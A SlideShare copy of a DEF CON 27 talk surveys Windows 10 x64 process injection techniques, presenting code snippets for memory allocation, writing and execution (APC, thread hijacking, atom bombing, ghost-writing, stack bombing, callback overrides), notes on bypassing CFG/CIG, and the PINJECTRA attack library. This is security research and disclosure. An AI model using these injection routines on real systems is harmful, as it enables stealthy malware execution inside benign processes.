SlideShare una empresa de Scribd logo

DEF CON 27- ITZIK KOTLER and AMIT KLEIN - gotta catch them all

Felipe Prado
Felipe Prado

DEF CON 27- ITZIK KOTLER and AMIT KLEIN - gotta catch them all

Tecnología
1 de 64
Descargar para leer sin conexión
Process Injection Techniques - Gotta Catch Them All Amit Klein, VP Security Research Itzik Kotler, CTO and co-founder Safebreach Labs
About Itzik Kotler • 15+ years in InfoSec • CTO & Co-Founder of SafeBreach • Presented in Black Hat, DEF CON, HITB, RSA, CCC and more. • http://www.ikotler.org
About Amit Klein • 28 years in InfoSec • VP Security Research Safebreach (2015-Present) • 30+ Papers, dozens of advisories against high profile products • Presented in BlackHat, DefCon, HITB, NDSS, InfoCom, DSN, RSA, CertConf, Bluehat, OWASP Global, OWASP EU, AusCERT and more • http://www.securitygalore.com
Why this research? • No comprehensive collection/catalog of process injection techniques • No separation of true injections from process hollowing/spawning • No categorization (allocation vs. memory write vs. execution), analysis, comparison • Update for Windows 10 (latest versions), x64
Kudos and hat-tip • Kudos to the following individuals/companies, for inventing/developing/documenting/POCing many techniques: • Adam of Hexacorn • Odzhan • EnSilo • Csaba Fitzl AKA TheEvilBit • And many others… • Hat tip to EndGame for providing the first compilation of injection techniques.
True process injection • True process injection – from live userspace process (malware) to live userspace process (target, benign) • In contrast to (out of scope): • Process spawning and hollowing – spawning the “target” process and injecting into it (especially before execution) • Pre-execution – e.g. DLL hijacking, AppCert, AppInit, LSP providers, Image File Execution Options, etc.
Windows 10, x64 • Windows 10 • CFG (Control Flow Guard) – prevent indirect calls to non-approved addresses • CIG (Code Integrity Guard) - only allow modules signed by Microsoft/Microsoft Store/WHQL to be loaded into the process memory • x64 (vs. x86) • Calling convention – first 4 arguments in (volatile) registers: RCX, RDX, R8, R9. Invoking functions (from ROP) necessitates control over some/all these registers. • No POPA - writing ROP is more difficult (bootstrapping registers)
The enemy of a good PoC… HANDLE th = OpenThread(THREAD_SET_CONTEXT| THREAD_QUERY_INFORMATION, FALSE, thread_id); ATOM a = GlobalAddAtomA(payload); NtQueueApcThread(th, GlobalGetAtomNameA, (PVOID)a, (PVOID)(target_payload), (PVOID)(sizeof(payload)));
The scope • True process injection • Running “sequence” of logic/commands in the target process (not just spawning cmd.exe…) • Windows 10 version 1803 and above • x64 injecting process, x64 target process, both medium integrity • Non-admin • Evaluation against Windows 10 protections (CFG, CIG)
CFG strategy • Disable CFG • Standard Windows API SetProcessValidCallTargets() can be used to deactivate CFG in the target process (remotely!) • Suspicious… • May be disabled/restricted in the future • Allocate/set executable memory (+making all the allocation CFG- valid) • VirtualAllocEx/VirtualProtectEx • Suspicious… • Playing by the rules – writing non-executable data (ROP chain), and using a CFG-agnostic execution method to run a stack pivot gadget (or similar) • Difficult…
Other defenses • Used to be eliminated from the target process using SetProcessMitigationPolicy • 3 argument function, can be invoked remotely via NtQueueApcThread • No longer works (1809). • CIG is most painful (no loading of arbitrary DLLs)
Typical process injection building blocks • Memory allocation • May be implicit (cave, stack, …) • Page permission issues • Control over allocation address? • CFG validity? • Memory writing • Restricted size/charset? • Atomic? • Execution • Target has to be CFG-valid? • Control over registers? • Limitations/pre-requisites
Process injection techniques
Classic memory allocation technique HANDLE h = OpenProcess(PROCESS_VM_OPERATION, FALSE, process_id); LPVOID target_payload=VirtualAllocEx(h,NULL,sizeof(payload), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE); • Can allocate executable pages • For executable pages, Windows automatically sets all the region to be CFG-valid • Variant – allocating RW pages, then adding X with VirtualProtectEx
The classic WriteProcessMemory memory writing technique HANDLE h = OpenProcess(PROCESS_VM_WRITE, FALSE, process_id); WriteProcessMemory(h, target_payload, payload, sizeof(payload), NULL); • No prerequisites, no limitations. Address is controlled. • CFG – if the allocation set execution privileges (e.g. VirtualAllocEx), then all the region is CFG-valid. • CIG – no impact.
The classic CreateRemoteThread execution technique HANDLE h = OpenProcess(PROCESS_CREATE_THREAD, FALSE, process_id); CreateRemoteThread(h, NULL, 0, (LPTHREAD_START_ROUTINE) target_execution, RCX, 0, NULL); • Pre-requisites – none. • CIG – no impact • CFG – target_execution should be valid CFG target. • Registers – control over RCX
A classic DLL injection execution technique HANDLE h = OpenProcess(PROCESS_CREATE_THREAD, FALSE, process_id); CreateRemoteThread(h, NULL, 0, (LPTHREAD_START_ROUTINE)LoadLibraryA, target_DLL_path, 0, NULL); • Pre-requisites – the DLL is on disk; write-technique used to write the DLL path to the target process; DllMain is restricted (loader lock). • CFG – no impact • CIG – blocks this technique • Variant: using QueueUserAPC/NtQueueApcThread
Another classic DLL injection execution technique HMODULE h = LoadLibraryA(dll_path); HOOKPROC f = (HOOKPROC)GetProcAddress(h, "GetMsgProc"); // GetMessage hook SetWindowsHookExA(WH_GETMESSAGE, f, h, thread_id); PostThreadMessage(thread_id, WM_NULL, NULL, NULL); // trigger the hook • Pre-requisites – the DLL is on disk, exports e.g. GetMsgProc • CFG – no impact • CIG – blocks this technique
The classic APC execution technique HANDLE h = OpenThread(THREAD_SET_CONTEXT, FALSE, thread_id); QueueUserAPC((LPTHREAD_START_ROUTINE)target_execution, h, RCX); or NtQueueApcThread(h, (LPTHREAD_START_ROUTINE)target_execution, RCX, RDX, R8D); • Pre-requisites – thread must be in alertable state (next slide) • CIG – no impact • CFG – target_execution should be valid CFG target. • Registers – control over RCX (NtQueueApcThread – RCX, RDX, R8D)
Alertable state functions The following 5 functions (and their low-level syscall wrappers): • SleepEx • NtDelayExecution • WaitForSingleObjectEx • NtWaitForSingleObject • WaitForMultipleObjectsEx • NtWaitForMultipleObjects • SignalObjectAndWait • NtSignalAndWaitForSingleObject • MsgWaitForMultipleObjectsEx (probably RealMsgWaitForMultipleObjectsEx) • NtUserMsgWaitForMultipleObjectsEx Quite common! Easily detected – RIP at internal function +0x14 (right after SYSCALL)
The classic thread hijacking execution technique (SIR) HANDLE t = OpenThread(THREAD_SET_CONTEXT, FALSE, thread_id); SuspendThread(t); CONTEXT ctx; ctx.ContextFlags = CONTEXT_CONTROL; ctx.Rip = (DWORD64)target_execution; SetThreadContext(t, &ctx); ResumeThread(t);
SIR continued • Pre-requisites: none. • CFG – no impact (!) except RSP • Control over registers: no guaranteed control over volatile registers (RAX, RCX, RDX, R8-R11). Control over RSP is limited (stack reservation limits). • With RW memory (no X): • Use write primitive to write ROP chain to the target process • Set RIP to a stack pivot gadget to set RSP to the controlled memory
Ghost-writing (monolithic technique) • Like thread hijacking, but without the memory writing part… • Memory writing is achieved in steps, using SetThreadContext to set registers • At the end of each step, the thread is running an infinite loop (success marker) • Required ROP gadgets: • Sink gadget – infinite loop (JMP -2), marking the successful end of execution • Write gadget – e.g. MOV [RDI],RBX; …; RET • Stack pivot or equivalent • Step 1: use the write gadget to write the loop gadget into stack RDI=ctx.rsp, RBX=sink_gadget, RIP=write_gadget • Step 2: use the write gadget to write arbitrary memory (infinite loop after each QWORD): RDI=address, RBX=data, RSP=ctx.rsp-8, RIP=write_gadget • Step 3: execute stack pivot (or equivalent): RSP=new_stack, RIP=rop_gadget
Unused stack as memory - tips • Maintain distance from the official TOS (leave room for WinAPI call stack) • Don’t go too far – stack is limited (1MB) • Grow (commit) the stack by touching memory at page size (4KB) intervals • Mind the alignment (16B) when invoking functions
Ghost-writing (contd.) • Pre-requisites: writable memory • CFG: no impact (!) except RSP • CIG: no impact • Control over registers (step 3): no guaranteed control over volatile registers (RAX, RCX, RDX, R8-R11). Control over RSP is limited (stack reservation limits).
Shared memory writing technique HANDLE hm = OpenFileMapping(FILE_MAP_ALL_ACCESS,FALSE,section_name); BYTE* buf = (BYTE*)MapViewOfFile(hm, FILE_MAP_ALL_ACCESS, 0, 0, section_size); memcpy(buf+section_size-sizeof(payload), payload, sizeof(payload)); HANDLE h = OpenProcess(PROCESS_QUERY_INFORMATION | PROCESS_VM_READ, FALSE, process_id); char* read_buf = new char[sizeof(payload)]; SIZE_T region_size; for (DWORD64 address = 0; address < 0x00007fffffff0000ull; address += region_size) { MEMORY_BASIC_INFORMATION mem; SIZE_T buffer_size = VirtualQueryEx(h, (LPCVOID)address, &mem, sizeof(mem)); … Shared memory detection logic here … region_size = mem.RegionSize;
Shared memory detection logic if ((mem.Type == MEM_MAPPED) && (mem.State == MEM_COMMIT) && (mem.Protect == PAGE_READWRITE) && (mem.RegionSize == section_size)) { ReadProcessMemory(h, (LPCVOID)(address+section_size-sizeof(payload)), read_buf, sizeof(payload), NULL); if (memcmp(read_buf, payload, sizeof(payload)) == 0) { // the payload is at address + section_size - sizeof(payload); … break; } }
(contd.) • Pre-requisites: target process has RW shared memory, attacker knows the name and size • CFG – (shared) memory retains its access rights (typically not executable) • CIG – no impact
Atom bombing write technique Naïve code (payload length<256, with terminating NUL byte and no other NULs): HANDLE th = OpenThread(THREAD_SET_CONTEXT| THREAD_QUERY_INFORMATION, FALSE, thread_id); ATOM a = GlobalAddAtomA(payload); NtQueueApcThread(th, GlobalGetAtomNameA, (PVOID)a, (PVOID)(target_payload), (PVOID)(sizeof(payload))); • Original paper doesn’t write NUL bytes (assumes zeroed out target memory) – we devised a technique to write NUL bytes • Pre-requisites: thread must be in alertable state. target_payload is allocated, writable. • CFG/CIG – no impact. target_payload retains its access rights (typically not executable)
NtMapViewOfSection (allocating+) writing technique HANDLE fm = CreateFileMappingA(INVALID_HANDLE_VALUE, NULL, PAGE_EXECUTE_READWRITE, 0, sizeof(payload), NULL); LPVOID map_addr =MapViewOfFile(fm, FILE_MAP_ALL_ACCESS, 0, 0, 0); HANDLE p = OpenProcess(PROCESS_VM_WRITE | PROCESS_VM_OPERATION, FALSE, process_id); memcpy(map_addr, payload, sizeof(payload)); LPVOID target_payload=0; SIZE_T view_size=0; NtMapViewOfSection(fm, p, &target_payload, 0, sizeof(payload), NULL, &view_size, ViewUnmap, 0, PAGE_EXECUTE_READWRITE );
(contd.) • Cannot be used for already allocated memory. If target_payload is 0, Windows chooses the address; if target_payload>0, Windows will map to there (but it has to be an un-allocated memory). • Pre-requisites: none. Limitations: cannot write to allocated memory. • CFG – memory allocated with page execution privileges becomes valid CFG target! • CIG – not relevant
Unmap+rerwrite execution technique MODULEINFO ntdll_info; HMODULE ntdll = GetModuleHandleA("ntdll"); GetModuleInformation(GetCurrentProcess(), ntdll, &ntdll_info, sizeof(ntdll_info)); LPVOID ntdll_copy = malloc(ntdll_info.SizeOfImage); HANDLE p = OpenProcess(PROCESS_VM_WRITE | PROCESS_VM_READ | PROCESS_VM_OPERATION | PROCESS_SUSPEND_RESUME, FALSE, process_id); NtSuspendProcess(p); ReadProcessMemory(p, ntdll, ntdll_copy, ntdll_info.SizeOfImage, NULL); … // Patch e.g. NtClose in ntdll_copy NtUnmapViewOfSection(p, ntdll); … // Allocate +(Re)write ntdll_copy to address ntdll in target process FlushInstructionCache(p, ntdll, ntdll_info.SizeOfImage); NtResumeProcess(p);
(contd.) • Pre-requisite: Write technique must be able to allocate (at least) RX pages in a specific address • CFG – all the original CFG-valid addresses in NTDLL should be CFG-valid (or else process may crash). However, both VirtualAllocEx and NtMapViewOfSection set whole section to CFG-valid when PAGE_EXECUTE is requested. • CIG – not relevant • Control over registers: no • Note that in order not to destabilize the process: • Process-wide suspend • Copying the complete NTDLL memory (incl. static variables)
Callback override execution techniques • SetWindowLongPtr (SetWindowLong) • PROPagate • Kernel Callback Table • Ctrl-Inject • Service Control • USERDATA • ALPC callback • CLIBRDWNDCLASS • DnsQuery • WNF callback • Shatter-like: • WordWarping • Hyphentension • AutoCourgette • Streamception • Oleum • ListPLanting • Treepoline
Concept • Write code to the target process using a writing technique • Find/obtain a memory address of an object (with vtbl)/callback function • May be tricky – need to know that the process has the object/callback (e.g. ALPC, console apps, private clipboard) • Via API (e.g. GetWindowLongPtr) • Via memory search (e.g. ALPC) • Replace the object/callback (using a writing technique or standard API) to point at a chosen function/code • Must be CFG-valid target • May require some object/code adjustments • Trigger execution • May be tricky (e.g. DnsQuery) • (Restore original object/callback)
CtrlInject execution technique HANDLE h = OpenProcess(PROCESS_VM_OPERATION, FALSE, process_id); // PROCESS_VM_OPERATION is required for RtlEncodeRemotePointer void* encoded_addr = NULL; ntdll!RtlEncodeRemotePointer(h, target_execution, &encoded_addr); … // Use any Memory Write technique here to copy encoded_addr to kernelbase!SingleHandler in the target process INPUT ip; ip.type = INPUT_KEYBOARD; ip.ki.wScan = 0; ip.ki.time = 0; ip.ki.dwExtraInfo = 0; ip.ki.wVk = VK_CONTROL; ip.ki.dwFlags = 0; // 0 for key press SendInput(1, &ip, sizeof(INPUT)); Sleep(100); PostMessageA(hWindow, WM_KEYDOWN, 'C', 0); // hWindow is a handle to the application window
memset/memmove write technique HMODULE ntdll = GetModuleHandleA("ntdll"); HANDLE t = OpenThread(THREAD_SET_CONTEXT, FALSE, thread_id); for (int i = 0; i < sizeof(payload); i++) { NtQueueApcThread(t, GetProcAddress(ntdll, "memset"), (void*)(target_payload+i), (void*)*(((BYTE*)payload)+i), 1); } // Can finish with an “atomic” NtQueueApcThread(t, GetProcAddress(ntdll, "memmove"), (void*)target_payload_final, (void*)target_payload, sizeof(payload));
(contd.) • Prerequisites: thread must be in an alertable state, memory is allocated. • CFG: not affected (ntdll!memset is CFG-valid), memory retains its original access rights (typically RW) • CIG: not affected. • Writes to any address
Stack-bombing execution technique Naïve code (run and crash): HANDLE t = OpenThread(THREAD_SET_CONTEXT | THREAD_GET_CONTEXT | THREAD_SUSPEND_RESUME, FALSE, thread_id); SuspendThread(t); CONTEXT ctx; ctx.ContextFlags = CONTEXT_ALL; GetThreadContext(t, &ctx); DWORD64 ROP_chain = (DWORD64)ctx.Rsp; // for the 5 alertable state functions… … // Adjust ROP_chain based on ctx.rip (or use APC…) … // write ROP chain to ROP_chain memory address in target process ResumeThread(t); // when the current function returns, it’ll execute the ROP chain
Alertable state internal functions mov r10,rcx mov eax,SERVICE_DESCRIPTOR test byte ptr [SharedUserData+0x308],1 jne +3 syscall ret int 2E ret • No use of stack (tos=rsp=ptr to return address) • No use of volatile registers after return from kernel – injected code can use them
Analysis • Prerequisites: thread in alertable state (APC), or careful analysis of interrupted function; target (e.g. ROP gadget) should be RX. • CFG – no impact(!). Can use ROP chain. • CIG – no impact. • Control over registers: not volatile ones. Paper+Pinjectra has fully functional code (based on APC+memset)
From the FAIL Department • SetWinEventHook (DLL injection execution technique) • No DLL injection (Windows 10 v1903). All events are “out-of-context” • When did it last work? • Desktop Heap (write technique) • Implementation changed (in Windows 10?), desktop heap no longer shared among processes. If you manage to run any of these on Windows 10 x64 version 1903, please let us know!
Summary tables
Writing techniques Write Tech. Prerequisites Address control WriteProcessMemory (none) Full Existing Shared Memory Process has RW shared memory (none) Atom Bombing (APC) Thread in alertable state Full NtMapViewOfSection Target address is unallocated Full memset/memmove (APC) Thread in alertable state Full
Execution techniques Execution Tech. Family Prerequisites CFG/CIG DLL injection via CreateRemoteThread DLL injection DLL on disk; loader lock CIG requires MSFT signed DLL CreateRemoteThread (none) Target must be CFG-valid APC Thread in alertable state Target must be CFG-valid Thread execution hijacking (SIR) (none) (none) Windows hook DLL injection DLL on disk; target loads user32.dll CIG requires MSFT signed DLL
(contd.) Execution Tech. Family Prerequisites CFG/CIG Ghost-writing (none) (none) SetWindowLongPtr Callback override Extra windows bytes is a pointer to an object with a virtual table Target must be CFG-valid Unmap+overwrite (none) (none) PROPagate Callback override Process has subclassed window Target must be CFG-valid
(contd.) Execution Tech. Family Prerequisites CFG/CIG Kernel Callback Table Callback override Process must own a window Target must be CFG-valid Ctrl-Inject Callback override Console app. Target must be CFG-valid Service Control Callback override Service Target must be CFG-valid USERDATA Callback override Console app. Target must be CFG-valid ALPC callback Callback override Open ALPC port Target must be CFG-valid
(contd.) Execution Tech. Family Prerequisites CFG/CIG WNF callback Callback override Process must use WNF Target must be CFG-valid Shatter-style: WordWarping, Hyphentension, AutoCourgette(?), Streamception, Oleum Callback override window with RichEdit control Target must be CFG-valid Shatter-style: Listplanting, Treepoline Callback override window with ListView control Target must be CFG-valid
(contd.) Execution Tech. Family Prerequisites CFG/CIG Stack Bombing (thread in alertable state) (none)
Bonus: System DLL names for free • So you want to force loading a system DLL to a target process? • Maybe your favorite ROP gadget is there • e.g. QueueUserAPC(LoadLibraryA, thread, ptr to DLL name) • And you won’t/can’t write its name to the target process • Maybe you can’t use a memory writing technique • But the system DLL name is already there! • Kernelbase contains a list of 1000+ system DLL names • In Kernelbase!g_DllMap+8 there is a pointer to an array of structures, each one 3 QWORDs, where the first QWORD is a pointer to a system DLL name (ASCII, NUL- terminated), in kernelbase’s .rdata section. For example:
Meet PINJECTRA • Version: 1.0 (Initial release) • Programming Language: C/C++ • License: 3-Clause BSD • URL: https://github.com/SafeBreach-Labs/pinjectra
PINJECTRA -- High Level Overview • Visual Studio Solution that contains 4 Projects: • MsgBoxOnGetMsgProc ← DLL Artifact • MsgBoxOnProcessAttach ← DLL Artifact • Pinjectra ← Techniques & Demo Program • TestProcess ← Dummy Testing Program • Utilizes C/C++ static type system to provide a mix & match experience to rapid develop new process injection techniques, as well as to experiment with already- existing one
Stack Bombing Impl. in PINJECTRA: e = new CodeViaThreadSuspendInjectAndResume_Complex( new NtQueueApcThread_WITH_memset( new _ROP_CHAIN_1() ) ); e->inject(pid, tid);
Stack Bombing Demo
Ghost Writing Impl. in PINJECTRA: e = new CodeViaThreadSuspendInjectAndResume_ChangeRspChangeRip_Complex( new GhostWriting( new _ROP_CHAIN_2() ) ); e->inject(pid, tid);
Ghost Writing Demo
UnmapMap Impl. in PINJECTRA: e = new CodeViaProcessSuspendInjectAndResume_Complex( new CreateFileMappingA_MapViewOfFile_NtUnmapViewOfSection_NtMapViewOfSection( new _PAYLOAD_5() ) ); e->inject(pid, tid);
UnmapMap Demo
SetWindowLongPtr Impl. in PINJECTRA: e = new CodeViaSetWindowLongPtrA( new ComplexToMutableAdvanceMemoryWriter( new _PAYLOAD_4() , new VirtualAllocEx_WriteProcessMemory( NULL, 0, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE) ) ); e->inject(pid, tid);
SetWindowLongPtr Demo
Atom Bombing Impl. in PINJECTRA: e = new CodeViaQueueUserAPC( new OpenThread_OpenProcess_VirtualAllocEx_GlobalAddAtomA( _gen_payload_2(), PAYLOAD3_SIZE, PROCESS_ALL_ACCESS, MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE) ); e->inject(pid, tid);
Atom Bombing Demo
Summary (sound-bytes) • We map the vast territory of “true” process injection, and provide an analysis and a comparison in a single collection/repository • We provide a library (PINJECTRA) for mix-and-match generation of process injection attacks • We describe a new CFG-agnostic execution technique – stack bombing (and a memory writing technique – memset/memmove over APC)
Thank you! Questions?

Recomendados

[DSC] Introduction to Binary Exploitation
[DSC] Introduction to Binary Exploitation[DSC] Introduction to Binary Exploitation
[DSC] Introduction to Binary Exploitation
Florian Müller
 
Specializing the Data Path - Hooking into the Linux Network Stack
Specializing the Data Path - Hooking into the Linux Network StackSpecializing the Data Path - Hooking into the Linux Network Stack
Specializing the Data Path - Hooking into the Linux Network Stack
Kernel TLV
 
Decoupling Provenance Capture and Analysis from Execution
Decoupling Provenance Capture and Analysis from ExecutionDecoupling Provenance Capture and Analysis from Execution
Decoupling Provenance Capture and Analysis from Execution
Paul Groth
 
Tradeoffs in Automatic Provenance Capture
Tradeoffs in Automatic Provenance CaptureTradeoffs in Automatic Provenance Capture
Tradeoffs in Automatic Provenance Capture
Paul Groth
 
grsecurity and PaX
grsecurity and PaXgrsecurity and PaX
grsecurity and PaX
Kernel TLV
 
[Sitcon2018] Analysis and Improvement of IOTA PoW Implementation
[Sitcon2018] Analysis and Improvement of IOTA PoW Implementation[Sitcon2018] Analysis and Improvement of IOTA PoW Implementation
[Sitcon2018] Analysis and Improvement of IOTA PoW Implementation
Zhen Wei
 
CONFidence 2017: Escaping the (sand)box: The promises and pitfalls of modern ...
CONFidence 2017: Escaping the (sand)box: The promises and pitfalls of modern ...CONFidence 2017: Escaping the (sand)box: The promises and pitfalls of modern ...
CONFidence 2017: Escaping the (sand)box: The promises and pitfalls of modern ...
PROIDEA
 
Compromising Linux Virtual Machines with Debugging Mechanisms
Compromising Linux Virtual Machines with Debugging MechanismsCompromising Linux Virtual Machines with Debugging Mechanisms
Compromising Linux Virtual Machines with Debugging Mechanisms
Russell Sanford
 

Recomendados

[DSC] Introduction to Binary Exploitation
[DSC] Introduction to Binary Exploitation[DSC] Introduction to Binary Exploitation
[DSC] Introduction to Binary Exploitation
Florian Müller
 
Specializing the Data Path - Hooking into the Linux Network Stack
Specializing the Data Path - Hooking into the Linux Network StackSpecializing the Data Path - Hooking into the Linux Network Stack
Specializing the Data Path - Hooking into the Linux Network Stack
Kernel TLV
 
Decoupling Provenance Capture and Analysis from Execution
Decoupling Provenance Capture and Analysis from ExecutionDecoupling Provenance Capture and Analysis from Execution
Decoupling Provenance Capture and Analysis from Execution
Paul Groth
 
Tradeoffs in Automatic Provenance Capture
Tradeoffs in Automatic Provenance CaptureTradeoffs in Automatic Provenance Capture
Tradeoffs in Automatic Provenance Capture
Paul Groth
 
grsecurity and PaX
grsecurity and PaXgrsecurity and PaX
grsecurity and PaX
Kernel TLV
 
[Sitcon2018] Analysis and Improvement of IOTA PoW Implementation
[Sitcon2018] Analysis and Improvement of IOTA PoW Implementation[Sitcon2018] Analysis and Improvement of IOTA PoW Implementation
[Sitcon2018] Analysis and Improvement of IOTA PoW Implementation
Zhen Wei
 
CONFidence 2017: Escaping the (sand)box: The promises and pitfalls of modern ...
CONFidence 2017: Escaping the (sand)box: The promises and pitfalls of modern ...CONFidence 2017: Escaping the (sand)box: The promises and pitfalls of modern ...
CONFidence 2017: Escaping the (sand)box: The promises and pitfalls of modern ...
PROIDEA
 
Compromising Linux Virtual Machines with Debugging Mechanisms
Compromising Linux Virtual Machines with Debugging MechanismsCompromising Linux Virtual Machines with Debugging Mechanisms
Compromising Linux Virtual Machines with Debugging Mechanisms
Russell Sanford
 
Multiplatform JIT Code Generator for NetBSD by Alexander Nasonov
Multiplatform JIT Code Generator for NetBSD by Alexander NasonovMultiplatform JIT Code Generator for NetBSD by Alexander Nasonov
Multiplatform JIT Code Generator for NetBSD by Alexander Nasonov
eurobsdcon
 
한컴MDS_Virtual Target Debugging with TRACE32
한컴MDS_Virtual Target Debugging with TRACE32한컴MDS_Virtual Target Debugging with TRACE32
한컴MDS_Virtual Target Debugging with TRACE32
HANCOM MDS
 
OpenStackTage Cologne - OpenStack at 99.999% availability with Ceph
OpenStackTage Cologne - OpenStack at 99.999% availability with CephOpenStackTage Cologne - OpenStack at 99.999% availability with Ceph
OpenStackTage Cologne - OpenStack at 99.999% availability with Ceph
Danny Al-Gaaf
 
Bypassing DEP using ROP
Bypassing DEP using ROPBypassing DEP using ROP
Bypassing DEP using ROP
Japneet Singh
 
LCU14 209- LLVM Linux
LCU14 209- LLVM LinuxLCU14 209- LLVM Linux
LCU14 209- LLVM Linux
Linaro
 
Comparing On-The-Fly Accelerating Packages: Numba, TensorFlow, Dask, etc
Comparing On-The-Fly Accelerating Packages: Numba, TensorFlow, Dask, etcComparing On-The-Fly Accelerating Packages: Numba, TensorFlow, Dask, etc
Comparing On-The-Fly Accelerating Packages: Numba, TensorFlow, Dask, etc
Yukio Okuda
 
Heterogeneous multiprocessing on androd and i.mx7
Heterogeneous multiprocessing on androd and i.mx7Heterogeneous multiprocessing on androd and i.mx7
Heterogeneous multiprocessing on androd and i.mx7
Kynetics
 
Lnx eng traffic_control-1.0.7-compact
Lnx eng traffic_control-1.0.7-compactLnx eng traffic_control-1.0.7-compact
Lnx eng traffic_control-1.0.7-compact
Alessandro Selli
 
Skydive 31 janv. 2016
Skydive 31 janv. 2016Skydive 31 janv. 2016
Skydive 31 janv. 2016
Sylvain Afchain
 
Make Your Own Developement Board @ 2014.4.21 JuluOSDev
Make Your Own Developement Board @ 2014.4.21 JuluOSDevMake Your Own Developement Board @ 2014.4.21 JuluOSDev
Make Your Own Developement Board @ 2014.4.21 JuluOSDev
Jian-Hong Pan
 
Triton and symbolic execution on gdb
Triton and symbolic execution on gdbTriton and symbolic execution on gdb
Triton and symbolic execution on gdb
Wei-Bo Chen
 
Asymmetric Multiprocessing - Kynetics ELC 2018 portland
Asymmetric Multiprocessing - Kynetics ELC 2018 portlandAsymmetric Multiprocessing - Kynetics ELC 2018 portland
Asymmetric Multiprocessing - Kynetics ELC 2018 portland
Nicola La Gloria
 
Skydive, real-time network analyzer, container integration
Skydive, real-time network analyzer, container integrationSkydive, real-time network analyzer, container integration
Skydive, real-time network analyzer, container integration
Sylvain Afchain
 
Skydive 5/07/2016
Skydive 5/07/2016Skydive 5/07/2016
Skydive 5/07/2016
Sylvain Afchain
 
TIP1 - Overview of C/C++ Debugging/Tracing/Profiling Tools
TIP1 - Overview of C/C++ Debugging/Tracing/Profiling ToolsTIP1 - Overview of C/C++ Debugging/Tracing/Profiling Tools
TIP1 - Overview of C/C++ Debugging/Tracing/Profiling Tools
Xiaozhe Wang
 
Comprehensive XDP Off‌load-handling the Edge Cases
Comprehensive XDP Off‌load-handling the Edge CasesComprehensive XDP Off‌load-handling the Edge Cases
Comprehensive XDP Off‌load-handling the Edge Cases
Netronome
 
The Simple Scheduler in Embedded System @ OSDC.TW 2014
The Simple Scheduler in Embedded System @ OSDC.TW 2014The Simple Scheduler in Embedded System @ OSDC.TW 2014
The Simple Scheduler in Embedded System @ OSDC.TW 2014
Jian-Hong Pan
 
Open shmem
Open shmemOpen shmem
Open shmem
Ehsan Alirezaei
 
Linux kernel debugging(ODP format)
Linux kernel debugging(ODP format)Linux kernel debugging(ODP format)
Linux kernel debugging(ODP format)
yang firo
 
Q2.12: Debugging with GDB
Q2.12: Debugging with GDBQ2.12: Debugging with GDB
Q2.12: Debugging with GDB
Linaro
 
introduction to node.js
introduction to node.jsintroduction to node.js
introduction to node.js
orkaplan
 
Beyond Breakpoints: A Tour of Dynamic Analysis
Beyond Breakpoints: A Tour of Dynamic AnalysisBeyond Breakpoints: A Tour of Dynamic Analysis
Beyond Breakpoints: A Tour of Dynamic Analysis
Fastly
 

Más contenido relacionado

La actualidad más candente

Multiplatform JIT Code Generator for NetBSD by Alexander Nasonov
Multiplatform JIT Code Generator for NetBSD by Alexander NasonovMultiplatform JIT Code Generator for NetBSD by Alexander Nasonov
Multiplatform JIT Code Generator for NetBSD by Alexander Nasonov
eurobsdcon
 
OpenStackTage Cologne - OpenStack at 99.999% availability with Ceph
OpenStackTage Cologne - OpenStack at 99.999% availability with CephOpenStackTage Cologne - OpenStack at 99.999% availability with Ceph
OpenStackTage Cologne - OpenStack at 99.999% availability with Ceph
Danny Al-Gaaf
 
LCU14 209- LLVM Linux
LCU14 209- LLVM LinuxLCU14 209- LLVM Linux
LCU14 209- LLVM Linux
Linaro
 
Make Your Own Developement Board @ 2014.4.21 JuluOSDev
Make Your Own Developement Board @ 2014.4.21 JuluOSDevMake Your Own Developement Board @ 2014.4.21 JuluOSDev
Make Your Own Developement Board @ 2014.4.21 JuluOSDev
Jian-Hong Pan
 
TIP1 - Overview of C/C++ Debugging/Tracing/Profiling Tools
TIP1 - Overview of C/C++ Debugging/Tracing/Profiling ToolsTIP1 - Overview of C/C++ Debugging/Tracing/Profiling Tools
TIP1 - Overview of C/C++ Debugging/Tracing/Profiling Tools
Xiaozhe Wang
 

La actualidad más candente (20)

Multiplatform JIT Code Generator for NetBSD by Alexander Nasonov
Multiplatform JIT Code Generator for NetBSD by Alexander NasonovMultiplatform JIT Code Generator for NetBSD by Alexander Nasonov
Multiplatform JIT Code Generator for NetBSD by Alexander Nasonov
 
한컴MDS_Virtual Target Debugging with TRACE32
한컴MDS_Virtual Target Debugging with TRACE32한컴MDS_Virtual Target Debugging with TRACE32
한컴MDS_Virtual Target Debugging with TRACE32
 
OpenStackTage Cologne - OpenStack at 99.999% availability with Ceph
OpenStackTage Cologne - OpenStack at 99.999% availability with CephOpenStackTage Cologne - OpenStack at 99.999% availability with Ceph
OpenStackTage Cologne - OpenStack at 99.999% availability with Ceph
 
Bypassing DEP using ROP
Bypassing DEP using ROPBypassing DEP using ROP
Bypassing DEP using ROP
 
LCU14 209- LLVM Linux
LCU14 209- LLVM LinuxLCU14 209- LLVM Linux
LCU14 209- LLVM Linux
 
Comparing On-The-Fly Accelerating Packages: Numba, TensorFlow, Dask, etc
Comparing On-The-Fly Accelerating Packages: Numba, TensorFlow, Dask, etcComparing On-The-Fly Accelerating Packages: Numba, TensorFlow, Dask, etc
Comparing On-The-Fly Accelerating Packages: Numba, TensorFlow, Dask, etc
 
Heterogeneous multiprocessing on androd and i.mx7
Heterogeneous multiprocessing on androd and i.mx7Heterogeneous multiprocessing on androd and i.mx7
Heterogeneous multiprocessing on androd and i.mx7
 
Lnx eng traffic_control-1.0.7-compact
Lnx eng traffic_control-1.0.7-compactLnx eng traffic_control-1.0.7-compact
Lnx eng traffic_control-1.0.7-compact
 
Skydive 31 janv. 2016
Skydive 31 janv. 2016Skydive 31 janv. 2016
Skydive 31 janv. 2016
 
Make Your Own Developement Board @ 2014.4.21 JuluOSDev
Make Your Own Developement Board @ 2014.4.21 JuluOSDevMake Your Own Developement Board @ 2014.4.21 JuluOSDev
Make Your Own Developement Board @ 2014.4.21 JuluOSDev
 
Triton and symbolic execution on gdb
Triton and symbolic execution on gdbTriton and symbolic execution on gdb
Triton and symbolic execution on gdb
 
Asymmetric Multiprocessing - Kynetics ELC 2018 portland
Asymmetric Multiprocessing - Kynetics ELC 2018 portlandAsymmetric Multiprocessing - Kynetics ELC 2018 portland
Asymmetric Multiprocessing - Kynetics ELC 2018 portland
 
Skydive, real-time network analyzer, container integration
